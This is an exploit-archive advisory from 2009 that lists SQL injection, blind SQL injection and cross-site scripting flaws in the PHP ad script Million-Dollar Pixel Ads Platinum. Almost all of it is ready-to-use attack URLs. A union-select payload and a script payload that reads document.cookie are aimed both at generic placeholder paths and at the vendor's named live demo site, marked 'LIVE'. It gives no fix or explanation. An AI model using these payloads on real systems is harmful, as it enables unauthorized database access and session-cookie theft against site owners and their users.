[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Million-Dollar Pixel Ads Platinum (SQL/XSS) Multiple Vulnerabilities
# Published : 2009-07-24
# Author : Moudi
# Previous Title : SerWeb <= 2.1.0-dev1 2009-07-02 Multiple RFI Vulnerabilities
# Next Title : Joomla Extension UIajaxIM 1.1 JavaScript Execution Vulnerability
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
[??] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[??] Million-Dollar Pixel Ads Platinum Multiple Remote Vulnerabilities
==============================================================================
[??] Script: [ Million-Dollar Pixel Ads Platinum ]
[??] Language: [ PHP ]
[??] Download: [ http://www.turnkeysetup.net/details_million-platinum.php ]
[??] Founder: [ Moudi <m0udi@9.cn> ]
[??] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[??] Team: [ EvilWay ]
[??] Dork: [ OFF ]
[??] Price: [ $447.97 ]
[??] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : SQL INJECTION vulnerability ]===
[??] http://www.site.com/patch/search.php?keywords=1&selectcategory=[SQL]&submit=search
[??] http://www.turnkeysetup.net/demos/million/search.php?keywords=1&selectcategory=1+union+select+version()--&submit=search
===[ Exploit + LIVE : BLIND SQL vulnerability ]===
[??] http://www.site.com/patch/search.php?keywords=1&selectcategory=[BLIND]
[??] http://www.turnkeysetup.net/demos/million/search.php?keywords=1&selectcategory=1 and 1=1+union+select+version()--&submit=search
===[ Exploit XSS + LIVE : vulnerability ]===
[??] http://www.site.com/patch/buy1.php?category=11&place=[XSS]
[??] http://www.site.com/patch/index2.php?category=[XSS]
[??] http://www.site.com/patch/search.php?keywords=1&selectcategory=[XSS]
[??] http://www.turnkeysetup.net/demos/million/buy1.php?category=11&place="><script>alert(document.cookie);</script>
[??] http://www.turnkeysetup.net/demos/million/index2.php?category="><script>alert(document.cookie);</script>
[??] http://www.turnkeysetup.net/demos/million/search.php?keywords=1&selectcategory="><script>alert(document.cookie);</script>
Author: Moudi
###########################################################################
# www.Syue.com [2009-07-24]